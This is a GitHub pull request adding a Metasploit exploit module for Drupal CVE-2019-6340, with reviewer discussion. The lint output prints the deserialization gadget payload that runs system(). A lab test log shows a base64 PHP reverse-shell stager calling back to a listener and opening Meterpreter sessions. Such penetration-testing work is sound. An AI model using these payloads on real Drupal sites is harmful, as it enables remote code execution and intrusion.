Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Drupal SA-CORE-2019-003 (CVE-2019-6340) #11481

Merged
merged 22 commits into from Mar 6, 2019

Conversation

Projects
None yet
7 participants
@rotemreiss
Copy link
Contributor

rotemreiss commented Feb 25, 2019

Add new exploit for Drupal SA-CORE-2019-003.

This is my first Metasploit exploit so be gentle with me ;)

#7108, #9876

rotemreiss added some commits Feb 25, 2019

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Feb 25, 2019

Please add some module documentation for this module.

@bcoles

This comment has been minimized.

Copy link
Contributor

bcoles commented Feb 25, 2019

msftidy is unhappy and complained a lot. It's nothing personal. msftidy never has anything nice to say.

$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:97 - [WARNING] Spaces at EOL
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:110 - [WARNING] Spaces at EOL
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:110 - [WARNING] Tabbed indent: "\t\tprint_error \"Exploit failed, in case that VHOST was not defined, consider to set that option\" \t\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:128 - [WARNING] Space-Tab mixed indent: " \thost = \"\#{datastore['VHOST']}\" || \"\#{rhost}\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:129 - [WARNING] Space-Tab mixed indent: " \tif !datastore['VHOST']\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:130 - [WARNING] Space-Tab mixed indent: " \t\tprint_warning \"The exploit may not work when using IP instead of host name, consider to set VHOST option\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:131 - [WARNING] Space-Tab mixed indent: " \tend\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:152 - [WARNING] Space-Tab mixed indent: "\t \"link\" => [\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:152 - [WARNING] Tabbed indent: "\t \"link\" => [\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:153 - [WARNING] Space-Tab mixed indent: "\t {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:153 - [WARNING] Tabbed indent: "\t {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:154 - [WARNING] Space-Tab mixed indent: "\t \"value\" => \"link\",\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:154 - [WARNING] Tabbed indent: "\t \"value\" => \"link\",\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:155 - [WARNING] Space-Tab mixed indent: "\t \"options\" => \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:\#{cmd_len}:\\\"\#{cmd}\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:155 - [WARNING] Tabbed indent: "\t \"options\" => \"O:24:\\\"GuzzleHttp\\\\Psr7\\\\FnStream\\\":2:{s:33:\\\"\\u0000GuzzleHttp\\\\Psr7\\\\FnStream\\u0000methods\\\";a:1:{s:5:\\\"close\\\";a:2:{i:0;O:23:\\\"GuzzleHttp\\\\HandlerStack\\\":3:{s:32:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000handler\\\";s:\#{cmd_len}:\\\"\#{cmd}\\\";s:30:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000stack\\\";a:1:{i:0;a:1:{i:0;s:6:\\\"system\\\";}}s:31:\\\"\\u0000GuzzleHttp\\\\HandlerStack\\u0000cached\\\";b:0;}i:1;s:7:\\\"resolve\\\";}}s:9:\\\"_fn_close\\\";a:2:{i:0;r:4;i:1;s:7:\\\"resolve\\\";}}\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:156 - [WARNING] Space-Tab mixed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:156 - [WARNING] Tabbed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:157 - [WARNING] Space-Tab mixed indent: "\t ],\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:157 - [WARNING] Tabbed indent: "\t ],\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:158 - [WARNING] Space-Tab mixed indent: "\t \"_links\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:158 - [WARNING] Tabbed indent: "\t \"_links\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:159 - [WARNING] Space-Tab mixed indent: "\t \"type\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:159 - [WARNING] Tabbed indent: "\t \"type\" => {\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:160 - [WARNING] Space-Tab mixed indent: "\t \"href\" => \"\#{vhost_full_uri}rest/type/shortcut/default\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:160 - [WARNING] Tabbed indent: "\t \"href\" => \"\#{vhost_full_uri}rest/type/shortcut/default\"\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:161 - [WARNING] Space-Tab mixed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:161 - [WARNING] Tabbed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:162 - [WARNING] Space-Tab mixed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:162 - [WARNING] Tabbed indent: "\t }\n"
modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb:163 - [WARNING] Tabbed indent: "\t}\n"
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------

bcoles and others added some commits Feb 25, 2019

Update modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb
Co-Authored-By: rotemreiss <reiss.r@gmail.com>
Update modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb
Co-Authored-By: rotemreiss <reiss.r@gmail.com>
Update modules/exploits/unix/webapp/drupal_sa_core_2019_003.rb
Co-Authored-By: rotemreiss <reiss.r@gmail.com>
@busterb

This comment has been minimized.

Copy link
Contributor

busterb commented Feb 25, 2019

Nice first try! There are a good number of improvements you should make, along with some module documentation, etc. I'd suggest starting with an empty module, and only add the code you need from examples. That'll help you understand better how all the pieces work together.

Our local analysis of this vulnerability made it seem like too much of a stretch to see the specific circumstances required for exploitability being very readily expressed in the wild, so we didn't attempt to create a module locally. Feel free to open a new PR for this when you think it is ready.

Thanks!

@busterb busterb closed this Feb 25, 2019

@wvu-r7 wvu-r7 referenced this pull request Feb 25, 2019

Merged

Errata for a few of my modules #11483

4 of 4 tasks complete
@rotemreiss

This comment has been minimized.

Copy link
Contributor Author

rotemreiss commented Feb 25, 2019

Our local analysis of this vulnerability made it seem like too much of a stretch to see the specific circumstances required for exploitability being very readily expressed in the wild, so we didn't attempt to create a module locally. Feel free to open a new PR for this when you think it is ready.

@busterb By that you mean that the exploit isn't "bullet-proof" / reliable enough or something else?
I've already invested lot of my time in that, so I'm wondering if I can complete those fixes listed above and then it will be merged?
It is indeed not 100% bullet proof, especially because of the rest endpoints, but it is impossible to cover all the exploitation options, so this is why I took the node one, which is the most common one in use (trust me that I know Drupal..). I think that this should be covered on my documentation but not more than that.

The code in that new module is mostly after I removed / fixed things that are irrelevant or seems to much complicated for that use case. (e.g. the drupal_version) If you think that I missed something, I'll be glad to learn from you guys and hopefully to contribute more modules in the future.

@wvu-r7 BTW I am insulted that you didn't give us credit in your Drupalgeddon 2 module 😜

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Feb 25, 2019

['URL', 'https://research.checkpoint.com/uncovering-drupalgeddon-2/'],

Credit right here. Normally we put vuln discovery, PoC, and module authors in the Author field.

If you'd like to be added as an author, I'd be happy to, but I worked off the PoCs directly. Relevant independent analysis (such as the greysec.net thread) was referenced. That said, your blog post was a great read!

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Feb 25, 2019

@rotemreiss: I would be happy to merge the module if the review comments are addressed, the requirements and limitations on the vuln are noted (all Web Services enabled and per-node caching), and documentation is added!

You can continue to push commits here, and when you're ready to reopen, just ping us!

@wvu-r7 wvu-r7 changed the title Drupal sa core 2019 003 Add Drupal SA-CORE-2019-003 (CVE-2019-6340) Feb 25, 2019

rotemreiss added some commits Feb 25, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Feb 25, 2019

Since we've accumulated some history here, let's reopen this so we can track it instead of having to reference it. I apologize for the misdirection!

@wvu-r7 wvu-r7 reopened this Feb 25, 2019

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Feb 25, 2019

@rotemreiss: You'll want to rebase against incorporate the changes from master now that #11483 has merged. I have another PR coming for full_uri, so it's best to wait for that to rebase or merge master.

rotemreiss added some commits Feb 25, 2019

@rotemreiss

This comment has been minimized.

Copy link
Contributor Author

rotemreiss commented Feb 25, 2019

@wvu-r7 Cool, I'll try that after you'll make your changes. I'm glad that I understood the framework ok and it wasn't me reinventing the wheel.
Anyway I've completed the fixes + added some improvements.
I also ran msftidy which is now seems clean (hopefully I didn't miss a configuration flag or something like that).
Everything was also tested once again on some positive and negative flows.

In the beginning I thought that it will take me ~3 hours.. I think I spent something like a day an a half on that :S . If you can merge it before your full_uri fix it will also be great and I promise to change my code afterwards (merging all that work will make me full good 😉 )

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Feb 26, 2019

I merged #11485, since I don't like module PRs blocking library changes. You can still change your code later, or I can handle it when I do testing and final cleanup.

@wvu-r7 wvu-r7 self-assigned this Feb 26, 2019

@rotemreiss

This comment has been minimized.

Copy link
Contributor Author

rotemreiss commented Feb 26, 2019

I merged #11485, since I don't like module PRs blocking library changes. You can still change your code later, or I can handle it when I do testing and final cleanup.

I can take care of it, I'll just make the changes you did on #11485 manually on my env, since I'm on the latest release here I think.
Will be pushed in a few..

Remove custom imp. in favor of library change
Remove custom full_uri implementation in favor of a library change in #11485 which adds vhost support in the full_uri method.
@rotemreiss

This comment has been minimized.

Copy link
Contributor Author

rotemreiss commented Feb 26, 2019

Changed, tested and pushed ;) Let's make it happen?

@wvu-r7 wvu-r7 added feature and removed needs-docs labels Mar 5, 2019

@h00die

This comment has been minimized.

Copy link
Contributor

h00die commented Mar 5, 2019

This is not the right place for it, but i just wanted to say awesome job team. While I'm not keeping up on all the emails, everyone seems to be putting in a lot of work and really working hard to make this happen. While I dont have an immediate need for the module, let me be the first in the community to say thanks for working so hard to make this module happen!

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 5, 2019

@rotemreiss: Can you give the module a test? I'm ready to land when you are.

@wvu-r7

This comment has been minimized.

Copy link
Contributor

wvu-r7 commented Mar 6, 2019

drupal_restws_unserialize tested

msf5 > use exploit/unix/webapp/drupal_restws_unserialize
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set lhost 192.168.1.2
lhost => 192.168.1.2
msf5 exploit(unix/webapp/drupal_restws_unserialize) > options

Module options (exploit/unix/webapp/drupal_restws_unserialize):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   METHOD     POST             yes       HTTP method to use (Accepted: GET, POST, PATCH, PUT)
   NODE       1                no        Node ID to target with GET method
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Path to Drupal install
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.2      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   PHP In-Memory


msf5 exploit(unix/webapp/drupal_restws_unserialize) > check

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo uAteSs3llS
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[+] 127.0.0.1:80 - The target is vulnerable.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo O9wsGkTcUmN1Xexv3nKbhoZjJpLGbwwJm2HmR
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:56144) at 2019-03-05 20:26:14 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 11f5c33da9ec
OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Background session 1? [y/N]
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Started reverse TCP handler on 192.168.1.2:4444
[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo mir4I1UtJNUJpKxfXnt5gPzM1N7I
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[*] Sending stage (38247 bytes) to 192.168.1.2
[*] Meterpreter session 2 opened (192.168.1.2:4444 -> 192.168.1.2:56151) at 2019-03-05 20:26:28 -0600

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo
Computer    : 11f5c33da9ec
OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
Meterpreter : php/linux
meterpreter >
Background session 2? [y/N]
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set target Unix In-Memory
target => Unix In-Memory
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] Executing with system(): echo vFfWmcG4YE9Kz8s0S9k1XqtrPZX
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
[+] Drupal is vulnerable to code execution
[!] Enabling DUMP_OUTPUT for cmd/unix/generic
[*] Executing with system(): id
[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
{"message":"No authentication credentials provided."}uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Exploit completed, but no session was created.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > set method GET
method => GET
msf5 exploit(unix/webapp/drupal_restws_unserialize) > check

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[*] 127.0.0.1:80 - The target service is running, but could not be validated.
msf5 exploit(unix/webapp/drupal_restws_unserialize) > run

[*] Drupal 8 targeted at http://127.0.0.1/
[!] CHANGELOG.txt no longer contains patch level
[!] Enabling DUMP_OUTPUT for cmd/unix/generic
[*] Executing with system(): id
[*] Sending GET to /node/1 with link http://127.0.0.1/rest/type/shortcut/default
{"_links":{"self":{"href":"http:\/\/127.0.0.1\/articles\/give-it-a-go-and-grow-your-own-herbs?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/node\/article"},"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/revision_uid":[{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/uid":[{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json","lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_image":[{"href":"http:\/\/127.0.0.1\/sites\/default\/files\/home-grown-herbs.jpg","lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_tags":[{"href":"http:\/\/127.0.0.1\/tags\/grow-your-own?_format=hal_json","lang":"en"},{"href":"http:\/\/127.0.0.1\/tags\/seasonal?_format=hal_json","lang":"en"},{"href":"http:\/\/127.0.0.1\/tags\/herbs?_format=hal_json","lang":"en"}]},"nid":[{"value":1}],"uuid":[{"value":"19f125cf-a5e0-40ad-bf40-dce4e89a876b"}],"vid":[{"value":1}],"langcode":[{"value":"en","lang":"en"}],"type":[{"target_id":"article"}],"revision_timestamp":[{"value":"2019-03-05T22:29:14+00:00","format":"Y-m-d\\TH:i:sP"}],"_embedded":{"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/revision_uid":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/user\/user"}},"uuid":[{"value":"73ad2793-feab-42c3-a61f-8d21851d1a4f"}]}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/uid":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/user\/4?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/user\/user"}},"uuid":[{"value":"73ad2793-feab-42c3-a61f-8d21851d1a4f"}],"lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_image":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/sites\/default\/files\/home-grown-herbs.jpg"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/file\/file"}},"uuid":[{"value":"ecd49c10-3ced-4f40-bdf9-dc92ff407385"}],"lang":"en"}],"http:\/\/127.0.0.1\/rest\/relation\/node\/article\/field_tags":[{"_links":{"self":{"href":"http:\/\/127.0.0.1\/tags\/grow-your-own?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/taxonomy_term\/tags"}},"uuid":[{"value":"85897974-8b69-420d-a528-24fc44440672"}],"lang":"en"},{"_links":{"self":{"href":"http:\/\/127.0.0.1\/tags\/seasonal?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/taxonomy_term\/tags"}},"uuid":[{"value":"ce1a8796-a4ad-40a7-85cd-0850b4777d96"}],"lang":"en"},{"_links":{"self":{"href":"http:\/\/127.0.0.1\/tags\/herbs?_format=hal_json"},"type":{"href":"http:\/\/127.0.0.1\/rest\/type\/taxonomy_term\/tags"}},"uuid":[{"value":"3a2ee720-fba0-4dc8-b53f-f4cf5fc6e3a7"}],"lang":"en"}]},"status":[{"value":true,"lang":"en"}],"title":[{"value":"Give it a go and grow your own herbs","lang":"en"}],"created":[{"value":"2019-03-05T22:29:14+00:00","lang":"en","format":"Y-m-d\\TH:i:sP"}],"changed":[{"value":"2019-03-05T22:29:14+00:00","lang":"en","format":"Y-m-d\\TH:i:sP"}],"promote":[{"value":true,"lang":"en"}],"sticky":[{"value":false,"lang":"en"}],"default_langcode":[{"value":true,"lang":"en"}],"revision_translation_affected":[{"value":true,"lang":"en"}],"moderation_state":[{"value":"published","lang":"en"}],"path":[{"alias":"\/articles\/give-it-a-go-and-grow-your-own-herbs","pid":4,"langcode":"en","lang":"en"}],"body":[{"value":"\u003Cp\u003EThere\u0027s nothing like having your own supply of fresh herbs, readily available and close at hand to use while cooking. Whether you have a large garden or a small kitchen window sill, there\u0027s always enough room for something home grown.\u003C\/p\u003E\n\u003Ch2\u003EOutdoors\u003C\/h2\u003E\n\u003Ch3\u003EMint\u003C\/h3\u003E\n\u003Cp\u003EMint is a great plant to grow as it\u0027s hardy and can grow in almost any soil. Mint can grow wild, so keep it contained in a pot or it might spread and take over your whole garden.\u003C\/p\u003E\n\u003Ch3\u003ESage\u003C\/h3\u003E\n\u003Cp\u003ELike mint, sage is another prolific growing plant and will take over your garden if you let it. Highly aromatic, the sage plant can be planted in a pot or flower bed in well drained soil. The best way to store the herb is to sun dry the leaves and store in a cool, dark cupboard in a sealed container.\u003C\/p\u003E\n\u003Ch3\u003ERosemary\u003C\/h3\u003E\n\u003Cp\u003ERosemary plants grow into lovely shrubs. Easily grown from cuttings, rosemary plants do not like freezing temperatures so keep pots or planted bushes near the home to shelter them from the cold. It grows well in pots as it likes dry soil, but can survive well in the ground too. If pruning rosemary to encourage it into a better shape, save the branches and hang them upside down to preserve the flavor and use in food.\u003C\/p\u003E\n\u003Ch2\u003EIndoors\u003C\/h2\u003E\n\u003Ch3\u003EBasil\u003C\/h3\u003E\n\u003Cp\u003EPerfect in sunny spot on a kitchen window sill. Basil is an annual plant, so will die off in the autumn, so it\u0027s a good idea to harvest it in the summer if you have an abundance and dry it. Picked basil stays fresh longer if it is placed in water (like fresh flowers). A great way to store basil is to make it into pesto!\u003C\/p\u003E\n\u003Ch3\u003EChives\u003C\/h3\u003E\n\u003Cp\u003EA versatile herb, chives can grow well indoors. Ensure the plant is watered well, and gets plenty of light. Remember to regularly trim the chives. This prevents the flowers from developing and encourages new growth.\u003C\/p\u003E\n\u003Ch3\u003ECoriander (Cilantro)\u003C\/h3\u003E\n\u003Cp\u003ECoriander can grow indoors, but unlike the other herbs, it doesn\u0027t like full sun. If you have a south facing kitchen window, this isn\u0027t the place for it. Although not as thirsty as basil, coriander doesn\u0027t like dry soil so don\u0027t forget to water it! Cut coriander is best stored in the fridge.\u003C\/p\u003E\n","format":"basic_html","processed":"\u003Cp\u003EThere\u0027s nothing like having your own supply of fresh herbs, readily available and close at hand to use while cooking. Whether you have a large garden or a small kitchen window sill, there\u0027s always enough room for something home grown.\u003C\/p\u003E\n\u003Ch2\u003EOutdoors\u003C\/h2\u003E\n\u003Ch3\u003EMint\u003C\/h3\u003E\n\u003Cp\u003EMint is a great plant to grow as it\u0027s hardy and can grow in almost any soil. Mint can grow wild, so keep it contained in a pot or it might spread and take over your whole garden.\u003C\/p\u003E\n\u003Ch3\u003ESage\u003C\/h3\u003E\n\u003Cp\u003ELike mint, sage is another prolific growing plant and will take over your garden if you let it. Highly aromatic, the sage plant can be planted in a pot or flower bed in well drained soil. The best way to store the herb is to sun dry the leaves and store in a cool, dark cupboard in a sealed container.\u003C\/p\u003E\n\u003Ch3\u003ERosemary\u003C\/h3\u003E\n\u003Cp\u003ERosemary plants grow into lovely shrubs. Easily grown from cuttings, rosemary plants do not like freezing temperatures so keep pots or planted bushes near the home to shelter them from the cold. It grows well in pots as it likes dry soil, but can survive well in the ground too. If pruning rosemary to encourage it into a better shape, save the branches and hang them upside down to preserve the flavor and use in food.\u003C\/p\u003E\n\u003Ch2\u003EIndoors\u003C\/h2\u003E\n\u003Ch3\u003EBasil\u003C\/h3\u003E\n\u003Cp\u003EPerfect in sunny spot on a kitchen window sill. Basil is an annual plant, so will die off in the autumn, so it\u0027s a good idea to harvest it in the summer 